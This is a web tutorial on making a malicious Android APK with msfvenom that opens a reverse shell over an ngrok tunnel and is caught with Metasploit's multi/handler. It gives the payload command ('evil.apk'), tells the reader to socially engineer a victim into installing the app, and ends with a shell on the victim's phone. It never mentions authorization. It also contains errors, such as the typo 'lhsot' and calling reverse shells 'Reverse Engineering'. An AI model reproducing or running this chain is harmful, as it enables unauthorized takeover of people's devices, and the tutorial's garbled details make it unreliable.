Open In App

How to use a Reverse Shell in Metasploit in Kali Linux

Improve
Improve
Like Article
Like
Save
Share
Report

Metasploit is not just a single tool. It is a complete framework. It is a Ruby-based, modular penetration testing platform that enables you to write, test, and execute exploit code, it is flexible and extremely robust and has tons of tools to perform various simple and complex tasks. Metasploit Framework creates payloads in form of apk, exe, etc. format that can be executed, and once the script starts running it provides a connection to the victim’s system or phone. Metasploit framework is built in most of the Linux kernel operating Systems and we can also use it on Windows, 

 

We can download Metasploit Framework from the below link: 

https://www.metasploit.com/download

In this article, we will be gaining reverse shell access to an android phone using payload.

What is a Reverse Shell?

A reverse shell or connect-back shell is a way of taking over on victim’s system due to its vulnerabilities giving access to a shell session of the victim’s system. In most cases, the reverse shell is successful because here the victim only lets you into his system. Of course, a firewall prohibits the outer connection but most firewalls allow any outgoing connection. Hackers use victims to get into their system, the victim itself allows us to connect through itself, this is called Reverse Engineering.

Creating a reverse shell script of android using Metasploit-framework

In most of the Linux-based systems, Metasploit is already installed and we can also use it in windows but the process is different, in Windows, we will have a GUI(Graphical User Interface) experience but in Linux, you will have proper CLI(Command line interface ) experience. 

Let’s install it on our Linux Systems:

Step 1: Installation of Metasploit 

Fire up a terminal and install it by 

sudo apt install metasploit-framework

or else we can also clone the repository of the rapid7 on GitHub

git clone https://github.com/rapid7/metasploit-framework

After successful installation, we can try to start the Metasploit console just by writing:

msfconsole

 

Note: If you facing any installation issues try to clone it from GitHub.

You will be prompted with a blinking cursor with msf6> written. Well, exit this for now. To exit type

exit

Now we have to make a reverse shell script for an android device and the best suitable format would be a .apk file

Step 2: Using the Ngrok Tunneling service

Ngrok is a tunneling service that enables us to connect through servers or systems over WAN. It gives access to remote systems without even touching their networks. It is secure and a reliable tunneling service.

Create an id and download the file, after downloading the file open up a terminal and follow.

cd <path to ngrok>
unzip ngrok.zip

After that we will see a ngrok file unzipped out, now we have given it an access token that we have got from your ngrok dashboard.

Note: Go to the site where you downloaded the ngrok service you will see your auth token there with the command copy it.

ngrok config add-authtoken <your token>

We will see if nothing will happen but the token is saved on your system. now try starting the ngrok service to verify the process

./ngrok tcp 8080

 

Here we used TCP protocol so we have to specify it with a port number.

Note: Port number can be of your choice 4-digit number.

Step 3: Making the Payload

Now let it be open and fire a new terminal. We have to create a payload/script for a reverse shell. In the new terminal type the below command:

msfvenom -p android/meterpreter/reverse_tcp lhsot=0.tcp.in.ngrok.io lport=<the port address just beside> R> evil.apk

  • msfvenom: Command of the Metasploit framework used to create scripts
  • -p: stating the type of payload 
  • android/meterpreter/reverse_tcp: an inbuilt script of Metasploit used for android reverse shell connection.
  • lhost: To determine the host.
  • lport: To determine the port address.
  • R>: To determine the name and location of your payload.

Now all you have to do is do some Social engineering and Send the apk file to the victim.  Now we have to be ready for accepting the connection, so let’s prepare a session for it. Clear out the terminal and start

msfconsole

This will open the Metasploit console where we will be accepting the connection.

Now, 

msf6> use exploit/multi/handler
msf6> set payload android/meterpreter/reverse_tcp
msf6> set LHOST 127.0.0.1
msf6> set LPORT 8080
msf6> exploit -j

if the victim has installed the apk and run it for the first time, then you will be prompted to a meterpreter session or reverse shell.

 

After prompting to a meterpreter session, type 

help

We will see a bunch of commands you can do with the victim’s system. Let’s try to get a shell session, Just type shell 

meterpreter> shell

We will see this:

 


Last Updated : 07 Nov, 2022
Like Article
Save Article
Previous
Next
Share your thoughts in the comments
Similar Reads